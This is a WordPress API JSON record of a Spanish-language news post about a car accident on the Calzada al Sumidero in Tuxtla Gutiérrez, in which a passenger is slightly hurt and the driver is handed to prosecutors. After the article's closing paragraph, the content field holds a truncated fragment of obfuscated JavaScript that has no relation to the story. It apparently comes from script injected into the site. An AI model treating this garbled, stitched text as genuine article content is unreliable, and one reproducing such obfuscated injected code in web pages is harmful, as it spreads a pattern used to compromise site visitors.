{"id":12323,"date":"2023-10-29T21:44:21","date_gmt":"2023-10-29T21:44:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12323"},"modified":"2023-10-29T21:44:22","modified_gmt":"2023-10-29T21:44:22","slug":"colombiano-se-accidenta-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12323","title":{"rendered":"Colombiano se accidenta en la Calzada al Sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/FB_IMG_1698615807270-1024x576.jpg\" alt=\"\" class=\"wp-image-12324\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/FB_IMG_1698615807270-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/FB_IMG_1698615807270-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/FB_IMG_1698615807270-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/10\/FB_IMG_1698615807270.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 29 de octubre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Al amanecer de este domicilio se registr\u00f3 un aparatoso accidente en la Calzada al Sumidero y Colonia Albania Baja de Tuxtla Guti\u00e9rrez.Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando el conductor de un Mazda de color azul rey, se desplazaba en el carril de oriente a poniente sobre el Callej\u00f3n Vecinal y fue al salir a la Calzada se pas\u00f3 el camell\u00f3n central.En lugar de girar sobre su izquierda, sigui\u00f3 de frente y se accident\u00f3.Una mujer que viajaba de copiloto result\u00f3 con heridas menores la cual fue atendida por param\u00e9dicos de Protecci\u00f3n Civil Municipal.Al lugar arribaron tambi\u00e9n peritos de tr\u00e1nsito y se hicieron cargo de levantar la unidad y poner al conductor a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 29 de octubre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Al amanecer de este domicilio se registr\u00f3 un aparatoso accidente en la Calzada al Sumidero y Colonia Albania Baja de Tuxtla Guti\u00e9rrez.Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando el conductor de un Mazda de color azul rey, se desplazaba en el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12324,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12323","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12323","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12323"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12323\/revisions"}],"predecessor-version":[{"id":12325,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12323\/revisions\/12325"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12324"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12323"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12323"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}